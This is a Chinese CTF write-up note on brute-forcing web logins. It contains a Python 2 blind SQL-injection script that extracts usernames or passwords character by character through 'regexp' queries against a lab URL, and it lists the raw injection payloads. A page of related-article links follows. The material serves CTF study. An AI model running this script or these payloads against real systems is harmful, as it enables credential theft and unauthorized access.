1、burp爆破用户名密码
2、id，userid，useId多试几次
3、爆破后台目录，index.php,users.php,login.php,flag.php
4、脚本：

# -*- coding:utf-8 -*-
import httplib
import re
import urllibclass Attacker:def __init__(self, mode, url):self.url = urlself.domin = self.get_domin()self.mode = modestr1 = []for i in range(26):str1.append(chr(ord('a') + i))for i in range(26):str1.append(chr(ord('A') + i))for i in range(10):str1.append(chr(ord('0') + i))self.str_box = str1def get_domin(self):url = self.urlurl_a = url.split('://')if re.match('^http',url_a[0]):url = url_a[1]else:url = url_a[0]url_a = url.split('/')domin = url_a[0]return domindef crack(self):conn = httplib.HTTPConnection(self.domin)if self.mode == 1:aim = 'username'if self.mode == 2:aim = 'password'url = self.urlattack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')attack_url2 = urllib.quote('\' #')str_box = self.str_boxtry:string = '^'while True:for str_end in str_box:url_to_attack = url + attack_url1 + string + str_end + attack_url2 #print url_to_attackconn.request(method="GET", url=url_to_attack)response = conn.getresponse()res = response.read()if res.find('useless') > 0:string = string + str_endstr_end = -1print string[1:] #如果想看到破进程，取消此段注释breakif str_end != -1 and str_end == '9': breakself.name = stringprint self.name[1:]except:print "Something Wrong"print urldef main():attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2'attacker = Attacker(2, attack_url) #1为用户名注入，2为密码注入attacker.crack()if __name__ == '__main__':main()

正则注入

userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23

CTF web题总结--爆破用户名密码相关推荐

1. CTF Web题 部分WP

   1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...

2. 华三防火墙添加web用户_h3c防火墙用户名密码怎么样设置

   h3c防火墙对我们用处非常大!那么h3c防火墙用户名和密码该怎么样设置呢?下面由小编给你做出详细的h3c防火墙用户名密码设置介绍!希望对你有帮助! h3c防火墙用户名密码设置一: 你先命令行登陆防火墙 ...

3. i春秋python_i春秋CTF web题(1)

   之前边看writeup,边做实验吧的web题,多多少少有些收获.但是知识点都已记不清.所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup). ...

4. hxp 36C3 CTF Web题 WriteupBin Writeup (Selenium模拟点击+Content Security Policy+Nonce+Parsley.js触发错误提示)

   WriteupBin – A web challenge from hxp 36C3 CTF https://ctftime.org/event/825 题目部署 本地搭建: 解压WriteupBin ...

5. mysql 南邮ctf_南邮ctf web题记录（上）

   1.签到题 f12看源码就行了. md5 collision 题目贴出了源码,按照题意,a不等于QNKCDZO但是md5与QNKCDZO的md5相等时就可以获得flag. 如果两个字符经MD5加密后的 ...

6. CTF web题总结--LFI

   本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种: http://127.0.0.1/ ...

7. 攻防世界web题ics-06(爆破id值)

   打开界面:嚯!这花里胡哨 点来点去只有报表中心有回显: 发现url中id等于1,sql注入尝试无果, burp工具爆破id 对id的值进行爆破 burp报ERROR的话这是个bug,先点击Hex后点d ...

8. CTF web题 wp：

   1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次 ...

9. 四个有关文件传输的CTF WEB题(深育杯FakeWget、极客大挑战where_is_my_FUMO、2021陇原战疫CheckIN、N1CTF-curl trick)

   文章目录 深育杯FakeWget 极客大挑战where_is_my_FUMO 2021陇原战疫CheckIN N1CTF-curl trick wp来自官方发布和个人想法,觉得这四个题挺有意思的所以整 ...

最新文章

1. jQuery.width()和jQuery.css('width')的区别
2. 以太坊区块和交易存储
3. 【错误记录】Groovy 报错 ( Execution failed for task ‘:compileGroovy‘. ＞ org/apache/tools/ant/taskdefs/Java )
4. element-ui + redis + mongo + nuxt
5. 并行计算及GPU简介
6. 王兴最好的半年结束了
7. BZOJ-1934-Vote善意的投票-SHOI2007
8. antd table设置表格一个单元格的字体颜色_alireacttable：高性能 React 表格组件
9. 图嵌入综述 (arxiv 1709.07604) 译文第一、二章
10. 微信自定义菜单扩容？
11. java怎么给坦克上图片_Java坦克大战 (七) 之图片版
12. BZOJ 3166 set+可持久化trie树（OR 莫队）
13. 用java实现mysql数据可视化_java可视化界面操作数据库编程.doc
14. 有关sim800l的资料
15. crystaldiskmark使用
16. 名片管理系统python详解_取名字大全_免费男孩女孩起名字
17. Spring Boot整合MyBatis框架（完整的注解版）
18. 数据库开发与设计规范
19. 今日头条能干掉微信么？ | 畅言
20. 前端面经 300条，背完这些就够了！

热门文章

1. python入门指南bl-入门 第一个python可视化程序 基于pyqt5
2. 前端学python有什么用-对于一个小白，前端和python哪个更适合？
3. 有道精品课python-网易词典在线翻译
4. python输入语句-Python中的模块导入和读取键盘输入的方法
5. zerodivisionerror什么意思python-【转】为什么 Python 中的 True 等于 1
6. python使用字典格式化字符串-Python字符串格式方式 %s format()
7. python使用字典格式化字符串-Python中将（字典，列表等）变量格式化输出
8. python爬虫案例-python爬虫案例
9. 国内哪里培训python比较好-python培训机构怎么选择?哪家比较靠谱?
10. python爬虫新手项目-给新手推荐几个实用又适合上手的Python爬虫项目